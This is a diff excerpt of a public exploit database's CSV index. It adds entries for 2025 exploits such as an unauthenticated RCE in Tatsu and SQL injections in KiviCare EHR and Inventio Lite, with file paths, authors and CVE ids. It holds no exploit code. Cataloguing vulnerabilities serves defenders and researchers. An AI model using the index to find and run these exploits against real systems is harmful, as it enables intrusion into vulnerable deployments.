 32895,exploits/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1288;OSVDB-53658,,,,,https://www.securityfocus.com/bid/34447/info
 32896,exploits/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1290;OSVDB-53660,,,,,https://www.securityfocus.com/bid/34447/info
@@ -12426,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-8605,,,,,
 44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
 44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
+52264,exploits/multiple/webapps/52264.py,"UJCMS 9.6.3 - User Enumeration via IDOR",2025-04-18,"Cyd Tseng",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-12483,,,,,
 47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
 52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@@ -20391,6 +20395,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32516,exploits/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",webapps,php,80,2014-03-26,2014-03-26,1,CVE-2014-2531;OSVDB-104944,,,,,
 27003,exploits/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-01,2013-07-22,1,CVE-2006-0088;OSVDB-22382,,,,,https://www.securityfocus.com/bid/16110/info
 11481,exploits/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-16,,1,,,,,,
+52263,exploits/php/webapps/52263.py,"Inventio Lite 4 - SQL Injection",2025-04-18,pointedsec,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-44541,,,,,
 37974,exploits/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,webapps,php,,2012-10-26,2015-08-26,1,,,,,,https://www.securityfocus.com/bid/56293/info
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,,2019-09-06,2019-09-06,0,,,,,,
 18022,exploits/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",webapps,php,,2011-10-23,2011-10-23,0,OSVDB-83422,,,,http://www.exploit-db.cominverseflow.zip,
@@ -22511,6 +22516,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2979,exploits/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,webapps,php,,2006-12-21,2016-11-24,1,OSVDB-32444;CVE-2008-1635;CVE-2006-6764;OSVDB-32443;OSVDB-32442;CVE-2006-6763,,,,http://www.exploit-db.comkisgb-v5.0.0.zip,
 3278,exploits/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,webapps,php,,2007-02-05,2016-09-27,1,OSVDB-35831;CVE-2007-0826,,,,http://www.exploit-db.comKisiselSite2007.zip,
 32983,exploits/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,webapps,php,80,2014-04-22,2014-04-22,0,OSVDB-106179;CVE-2014-3757,,,,http://www.exploit-db.comkitForm_0.43.zip,
+52265,exploits/php/webapps/52265.py,"KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection",2025-04-18,samogod,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-11728,,,,,
 8885,exploits/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
 8884,exploits/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
 51859,exploits/php/webapps/51859.txt,"kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition",2024-03-05,"Mohammad Reza Omrani",webapps,php,,2024-03-05,2024-03-05,0,,,,,,
@@ -30908,6 +30914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
+52260,exploits/php/webapps/52260.py,"Tatsu 3.3.11 - Unauthenticated RCE",2025-04-18,"Milad karimi",webapps,php,,2025-04-18,2025-04-18,0,CVE-2021-25094,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
 43543,exploits/php/webapps/43543.txt,"Taxi Booking Script 1.0 - Cross-site Scripting",2018-01-12,Tauco,webapps,php,,2018-01-12,2018-01-12,0,,,,,,